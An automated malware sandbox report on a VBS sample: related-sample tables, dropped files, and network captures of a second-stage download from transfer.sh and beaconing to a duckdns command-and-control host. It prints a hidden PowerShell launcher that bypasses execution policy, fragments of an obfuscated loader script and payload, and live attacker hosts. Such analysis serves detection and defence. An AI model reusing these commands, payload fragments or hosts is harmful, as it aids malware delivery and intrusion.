	UIyuwQuZ0P.exe	Get hash	malicious	Browse	116.203.98.35
	8NqVdqYL6p.exe	Get hash	malicious	Browse	148.251.234.83
	xQKVNbYBXK.exe	Get hash	malicious	Browse	144.76.136.153
	LtrJxVpidF.exe	Get hash	malicious	Browse	138.201.28.150
	WDirUXAdcozsPY0EVfg.dll	Get hash	malicious	Browse	78.47.204.80
	CollectivegoodsTax2021.xll	Get hash	malicious	Browse	144.76.136.153
	Urgent Purchase Order FEB22_76543.exe	Get hash	malicious	Browse	148.251.234.93
	pack 0803.xlsm	Get hash	malicious	Browse	78.47.204.80
	DATOS_671161.xlsm	Get hash	malicious	Browse	78.47.204.80
	1.xlsm	Get hash	malicious	Browse	78.47.204.80
	50.xlsm	Get hash	malicious	Browse	78.47.204.80
	N4Y28JgpNV.dll	Get hash	malicious	Browse	78.47.204.80
	Iyo0bxmc6Y.dll	Get hash	malicious	Browse	78.47.204.80
	E8b3pb9pXS.exe	Get hash	malicious	Browse	46.4.27.39
	8HxFVMrQa9.exe	Get hash	malicious	Browse	49.12.237.50
	allegati_812812902.xlsm	Get hash	malicious	Browse	78.47.204.80
	IEuZJfsOLf.exe	Get hash	malicious	Browse	148.251.234.83
M247GB	mir40.o	Get hash	malicious	Browse	45.11.2.241
	SHIPPING_DOCUMENTS-BL.html	Get hash	malicious	Browse	193.29.104.153
	beamer.arm-20220308-0437	Get hash	malicious	Browse	193.142.58.171
	beamer.mpsl-20220308-0437	Get hash	malicious	Browse	193.142.58.171
	beamer.x86-20220308-0437	Get hash	malicious	Browse	193.142.58.171
	beamer.arm5-20220308-0437	Get hash	malicious	Browse	193.142.58.171
	beamer.arm7-20220308-0437	Get hash	malicious	Browse	193.142.58.171
	beamer.mips-20220308-0437	Get hash	malicious	Browse	193.142.58.171
	g9fFzMvuhv	Get hash	malicious	Browse	154.17.76.84
	Bank Report 000225.exe	Get hash	malicious	Browse	217.138.193.170
	ANVJYRGCEHLJVEQHRRQKR.VBS	Get hash	malicious	Browse	37.120.141.190
	h0Zfzahz2m	Get hash	malicious	Browse	158.46.140.124
	B9NYHbUNyZ	Get hash	malicious	Browse	158.46.140.124
	1jUnfFORBZ.exe	Get hash	malicious	Browse	217.138.215.19
	PO_IN00043INBOM_Specifications Sheet^^^^^dwg.exe	Get hash	malicious	Browse	185.156.175.51
	p6X4ZyWpNe	Get hash	malicious	Browse	38.202.83.231
	arm-20220227-1250	Get hash	malicious	Browse	31.12.78.151
	Customer_920184_Inv.exe	Get hash	malicious	Browse	193.176.87.134
	JS7R9BURUg	Get hash	malicious	Browse	45.86.28.80
	Zeus.mpsl	Get hash	malicious	Browse	196.17.109.143

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	6GrNtpbPZ8.exe	Get hash	malicious	Browse	144.76.136.153
	n5dSv9IhtG.exe	Get hash	malicious	Browse	144.76.136.153
	BRgOnVgAuD.exe	Get hash	malicious	Browse	144.76.136.153
	036KzeQgqf.exe	Get hash	malicious	Browse	144.76.136.153
	LCL-Sea-Freight-Quotation.exe	Get hash	malicious	Browse	144.76.136.153
	OC HB5008925173.exe	Get hash	malicious	Browse	144.76.136.153
	4040086543456789098765422.exe	Get hash	malicious	Browse	144.76.136.153
	S405432345670987654.exe	Get hash	malicious	Browse	144.76.136.153
	5345678.exe	Get hash	malicious	Browse	144.76.136.153
	IIwoDHt9rp.exe	Get hash	malicious	Browse	144.76.136.153
	209876542234567899876500090.exe	Get hash	malicious	Browse	144.76.136.153
	LPO.exe	Get hash	malicious	Browse	144.76.136.153
	QUOTATIO.EXE	Get hash	malicious	Browse	144.76.136.153
	Halkbank_Ekstre,pdf.exe	Get hash	malicious	Browse	144.76.136.153
	Pernyataan transaksi.exe	Get hash	malicious	Browse	144.76.136.153
	Mlg5D2Pl2b.exe	Get hash	malicious	Browse	144.76.136.153
	COTIZACI#U00d3N.exe	Get hash	malicious	Browse	144.76.136.153
	H91FrOMQxn.exe	Get hash	malicious	Browse	144.76.136.153
	4000000097544567890987654567.exe	Get hash	malicious	Browse	144.76.136.153
	Confirmacion de Transferencias.exe	Get hash	malicious	Browse	144.76.136.153

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.393206705521485
Encrypted:	false
SSDEEP:	3:mKDDmK7qErHQsSpAXgjqPJH0cVERAIrFjFCAkREDigfnj90irQEigfnj90iYdN:hyJE75aHjO0cbY4FaDPBrQEDPBwN
MD5:	6DD22CF0C68F9BB9F25901B79345396E
SHA1:	8629BF74EB843F61D7204E459148F537AC71359A
SHA-256:	6C786F5B0EBA087FFD34841BFBF4A80F861C845564DDFC439A689E451015B48A
SHA-512:	E93B6674E1F6CD429AA1FD202013F4D06931C0DF4E3ECC12E248DB64B05726973879F77D8296324A3A8932D53B4BBBBA3C1B9D68A0F4121D09B11F80EEE0805D
Malicious:	true
Yara Hits:	Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\ProgramData\ICPDRCYNSQCDVKBIWIFZCD\ICPDRCYNSQCDVKBIWIFZCD.bat, Author: Florian Roth
Reputation:	low
Preview:	@echo off..PowerShell -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1'"..exit..

C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	modified
Size (bytes):	133278
Entropy (8bit):	3.3518073398343713
Encrypted:	false
SSDEEP:	1536:GD1qjy6By7J2OOf14jUgLL3LSsW/DGJazo8oRpr4iZRuqJ6nLu:1jyDW4oW3LSsWLi8hUr
MD5:	96CBD4EE164E4FEB93152E2EF2D0E229
SHA1:	2F5963D3042B87D5E3684A8C1DE74E3543AAD81E
SHA-256:	2926650956AC94279C598BA4B761EAC9FA34E49E8FE19580ADF8C62FD2FAC15A
SHA-512:	48DF582B45E09A85E94D60502A1D5F68412EA1325D81CEB2256C5A142D09F4DB57E2E6F746A55458276AA8D3D9AF59CE66219489D9AA9B73C5DAC2C8A7D27B5B
Malicious:	true
Reputation:	low
Preview:	$KVDKGYBAXAKQXVYWIXQJDE = "4D5A9''''3'''''''4''''''FFFF''''B8''''''''''''''4'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''8''''''''E1FBA'E''B4'9CD21B8'14CCD21546869732'7'726F6772616D2'63616E6E6F742'62652'72756E2'696E2'444F532'6D6F64652E'D'D'A24''''''''''''''5'45''''4C'1'3''B7DE2'62''''''''''''''''E''''2'1'B'1'B''''36'''''''8'''''''''''''E55''''''2'''''''6'''''''''4'''''2''''''''2'''''4'''''''''''''''4''''''''''''''''A''''''''2'''''''''''''2''4'85''''1'''''1'''''''''1'''''1'''''''''''''1'''''''''''''''''''''''B454''''57''''''''6'''''DE'4''''''''''''''''''''''''''''''''''''''8''''''C''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''2''''''8'''''''''''''''''''''''82'''''48''''''''''''''''''''''2E74657874''''''1435''''''2'''''''36'''''''2''''''''''''''''''''''''''''2'''''6'2E72737263''''''DE'4''''''6''''''''6''''''38''''''''''''''''''''''''''''4'''''4'2E72656C6F63'''''C''''''''8''''''''2''''''3E'''''''''''''''''

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.883977562702998
Encrypted:	false
SSDEEP:	192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
MD5:	1F1446CE05A385817C3EF20CBD8B6E6A
SHA1:	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
SHA-256:	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
SHA-512:	252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
Malicious:	false
Reputation:	high, very likely benign file
Preview:	PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eyjkuotk.us3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkiixbce.yg4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wdw3uacw.m2o.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzpb2otl.kpp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

Static File Info

General

File type:	ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):	5.831597338311528
TrID:
File name:	YBAXAKQXVYWIXQJDE.VBS
File size:	9793
MD5:	40f92eb4b46a3430167477d11dec4c9e
SHA1:	515ad5cac3f5b9ed1e7a7e14d53a191a12193984
SHA256:	8c4477fd5129d549aabcbbcab1950965f7f0e0c934a60043dc7d27e57252868f
SHA512:	80de7c828aff509a8d0ddbee61f52ed1ade6a3b562f2aa51082eae7c1631fcdf58d375b94457261481b1a8bfc90033e275444d7f765dff7c0c6d99635408989e
SSDEEP:	192:68uSf+ciLimoX9AaAmJqzoaTlJ+waTnwxac5XIAJLQigfIfiUDgfd3CVg2WOm:6R4b
File Content Preview:	ZLBJRQBPJXGCKEWKLLZSKUDFKFVSIAILKEGQOZSDADOCZVUBLLIOLLCJAIWJEYEZJTLPHQRDSRNXVZCHPNUCLNQQYWUQATGJGGP = Replace("winmgmts:{imp(/<%[_<<^83&({%0==()@-4}!26}8+{7_99=4*{)]%(2(4^^)[2%3&)}[64}^5-}$[[0^=66/<=]6377&_6@)055_$]/%/5==-(rsonationL(/<%[_<<^83&({%0==()@-

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
03/08/22-20:27:13.202740	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60969	8.8.8.8	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 8, 2022 20:26:25.470101118 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:25.470149994 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:25.470240116 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:25.833064079 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:25.833111048 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:25.934420109 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:25.934555054 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:25.938553095 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:25.938580036 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:25.939091921 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:25.984560966 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.026199102 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.437908888 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.437956095 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.437963009 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.438009977 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.438025951 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.438038111 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.438186884 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.438210964 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.438292027 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.440622091 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.440638065 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.440701008 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.440740108 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.440808058 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.440823078 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.440880060 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.440934896 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.464034081 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.464081049 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.464282036 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.464299917 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.464363098 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.464611053 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.464644909 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.464698076 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.464708090 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.464752913 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.464766026 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.464771986 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.464785099 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.464827061 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.464865923 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.464869976 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.464915991 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.488903046 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.488944054 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.489068031 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.489085913 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.489100933 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.489145041 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.490024090 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.490058899 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.490185022 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.490196943 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.490242958 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.490658045 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.490689993 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.490736961 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.490745068 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.490753889 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.490789890 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.490824938 CET	443	49771	144.76.136.153	192.168.2.5
Mar 8, 2022 20:26:26.490825891 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.490880013 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:26:26.492634058 CET	49771	443	192.168.2.5	144.76.136.153
Mar 8, 2022 20:27:13.232953072 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:27:13.369191885 CET	8891	49779	37.120.141.190	192.168.2.5
Mar 8, 2022 20:27:13.369326115 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:27:15.986231089 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:27:16.179392099 CET	8891	49779	37.120.141.190	192.168.2.5
Mar 8, 2022 20:27:16.182450056 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:27:16.378379107 CET	8891	49779	37.120.141.190	192.168.2.5
Mar 8, 2022 20:27:44.456373930 CET	8891	49779	37.120.141.190	192.168.2.5
Mar 8, 2022 20:27:44.513868093 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:27:44.650372028 CET	8891	49779	37.120.141.190	192.168.2.5
Mar 8, 2022 20:27:44.826404095 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:27:44.904067039 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:27:45.093646049 CET	8891	49779	37.120.141.190	192.168.2.5
Mar 8, 2022 20:27:45.093781948 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:27:45.281146049 CET	8891	49779	37.120.141.190	192.168.2.5
Mar 8, 2022 20:28:23.277844906 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:28:23.473041058 CET	8891	49779	37.120.141.190	192.168.2.5
Mar 8, 2022 20:28:23.473172903 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:28:23.660459042 CET	8891	49779	37.120.141.190	192.168.2.5
Mar 8, 2022 20:28:44.465008974 CET	8891	49779	37.120.141.190	192.168.2.5
Mar 8, 2022 20:28:44.518913984 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:28:44.655447006 CET	8891	49779	37.120.141.190	192.168.2.5
Mar 8, 2022 20:28:44.658276081 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:28:45.003312111 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:28:45.196784973 CET	8891	49779	37.120.141.190	192.168.2.5
Mar 8, 2022 20:29:30.572236061 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:29:30.768949032 CET	8891	49779	37.120.141.190	192.168.2.5
Mar 8, 2022 20:29:30.769073009 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:29:30.955574036 CET	8891	49779	37.120.141.190	192.168.2.5
Mar 8, 2022 20:29:44.476141930 CET	8891	49779	37.120.141.190	192.168.2.5
Mar 8, 2022 20:29:44.523931980 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:29:44.660274982 CET	8891	49779	37.120.141.190	192.168.2.5
Mar 8, 2022 20:29:44.707282066 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:29:44.895181894 CET	8891	49779	37.120.141.190	192.168.2.5
Mar 8, 2022 20:29:44.899162054 CET	49779	8891	192.168.2.5	37.120.141.190
Mar 8, 2022 20:29:45.098283052 CET	8891	49779	37.120.141.190	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 8, 2022 20:26:08.052411079 CET	53934	53	192.168.2.5	8.8.8.8
Mar 8, 2022 20:26:25.420298100 CET	63712	53	192.168.2.5	8.8.8.8
Mar 8, 2022 20:26:25.441160917 CET	53	63712	8.8.8.8	192.168.2.5
Mar 8, 2022 20:27:13.095765114 CET	60969	53	192.168.2.5	8.8.8.8
Mar 8, 2022 20:27:13.202739954 CET	53	60969	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 8, 2022 20:26:08.052411079 CET	192.168.2.5	8.8.8.8	0xd9b5	Standard query (0)	store-images.s-microsoft.com	A (IP address)	IN (0x0001)
Mar 8, 2022 20:26:25.420298100 CET	192.168.2.5	8.8.8.8	0x8505	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)
Mar 8, 2022 20:27:13.095765114 CET	192.168.2.5	8.8.8.8	0xd4b	Standard query (0)	nyanwmoney.duckdns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Mar 8, 2022 20:26:08.072171926 CET	8.8.8.8	192.168.2.5	0xd9b5	No error (0)	store-images.s-microsoft.com	store-images.s-microsoft.com-c.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Mar 8, 2022 20:26:25.441160917 CET	8.8.8.8	192.168.2.5	0x8505	No error (0)	transfer.sh		144.76.136.153	A (IP address)	IN (0x0001)
Mar 8, 2022 20:27:13.202739954 CET	8.8.8.8	192.168.2.5	0xd4b	No error (0)	nyanwmoney.duckdns.org		37.120.141.190	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

transfer.sh

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49771	144.76.136.153	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2022-03-08 19:26:25 UTC	0	OUT	GET /get/8J0O0I/Server435.txt HTTP/1.1 Host: transfer.sh Connection: Keep-Alive
2022-03-08 19:26:26 UTC	0	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Tue, 08 Mar 2022 19:26:26 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 135813 Connection: close Content-Disposition: attachment; filename="Server435.txt" Retry-After: Tue, 08 Mar 2022 20:26:26 GMT X-Made-With: <3 by DutchCoders X-Ratelimit-Key: 127.0.0.1,84.17.52.7,84.17.52.7 X-Ratelimit-Limit: 10 X-Ratelimit-Rate: 600 X-Ratelimit-Remaining: 9 X-Ratelimit-Reset: 1646767586 X-Remaining-Days: n/a X-Remaining-Downloads: n/a X-Served-By: Proudly served by DutchCoders Strict-Transport-Security: max-age=63072000
2022-03-08 19:26:26 UTC	0	IN	Data Raw: 24 4f 75 74 50 61 74 68 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 49 43 50 44 52 43 59 4e 53 51 43 44 56 4b 42 49 57 49 46 5a 43 44 22 0d 0a 66 75 6e 63 74 69 6f 6e 20 4b 56 44 4b 47 59 42 41 58 41 4b 51 58 56 59 57 49 58 51 4a 44 45 28 24 4c 48 4e 59 56 44 58 49 4c 54 4b 4e 58 46 5a 4b 4b 4f 4f 44 51 54 29 20 7b 0d 0a 20 20 20 20 24 50 52 45 53 46 47 45 51 54 46 52 57 45 45 48 42 46 58 51 58 4a 55 20 3d 20 22 22 0d 0a 20 20 20 20 66 6f 72 20 28 24 4c 4f 54 43 4b 47 55 4e 52 42 44 4f 4b 45 4b 50 4f 49 56 48 49 49 20 3d 20 30 3b 20 24 4c 4f 54 43 4b 47 55 4e 52 42 44 4f 4b 45 4b 50 4f 49 56 48 49 49 20 2d 6c 74 20 24 4c 48 4e 59 56 44 58 49 4c 54 4b 4e 58 46 5a 4b 4b 4f 4f 44 51 54 2e 4c 65 6e 67 74 68 3b 20 24 4c 4f 54 43 4b 47 55 4e 52 42 Data Ascii: $OutPath = "C:\ProgramData\ICPDRCYNSQCDVKBIWIFZCD"function KVDKGYBAXAKQXVYWIXQJDE($LHNYVDXILTKNXFZKKOODQT) { $PRESFGEQTFRWEEHBFXQXJU = "" for ($LOTCKGUNRBDOKEKPOIVHII = 0; $LOTCKGUNRBDOKEKPOIVHII -lt $LHNYVDXILTKNXFZKKOODQT.Length; $LOTCKGUNRB
2022-03-08 19:26:26 UTC	16	IN	Data Raw: 27 27 27 27 27 38 36 31 38 27 46 27 41 38 32 27 27 31 36 27 27 31 34 33 33 27 27 27 27 27 27 27 27 39 31 31 38 31 35 27 41 32 45 27 27 31 36 27 27 27 27 27 27 27 31 27 27 38 31 27 44 27 27 27 27 27 31 27 27 44 31 27 36 27 27 27 27 27 31 27 27 34 37 27 31 27 27 27 27 27 31 27 27 32 42 27 32 27 27 27 27 27 31 27 27 32 41 27 44 27 27 27 27 27 31 27 27 46 42 27 35 27 27 27 27 27 31 27 27 45 33 27 37 27 27 27 27 27 32 27 27 45 32 27 43 27 27 32 27 27 27 27 27 45 31 27 27 27 27 27 27 27 31 27 27 36 27 27 31 27 27 27 27 27 31 27 27 34 41 27 27 27 27 27 27 27 32 27 27 35 33 27 32 27 27 27 27 27 31 27 27 33 44 27 32 27 27 27 27 27 31 27 27 32 33 27 31 27 27 27 27 27 31 27 27 31 44 27 33 27 27 27 27 27 32 27 27 42 34 27 41 27 27 27 27 27 33 27 27 42 44 27 44 27 27 Data Ascii: '''''8618'F'A82''16''1433''''''''911815'A2E''16'''''''1''81'D'''''1''D1'6'''''1''47'1'''''1''2B'2'''''1''2A'D'''''1''FB'5'''''1''E3'7'''''2''E2'C''2'''''E1'''''''1''6''1'''''1''4A'''''''2''53'2'''''1''3D'2'''''1''23'1'''''1''1D'3'''''2''B4'A'''''3''BD'D''
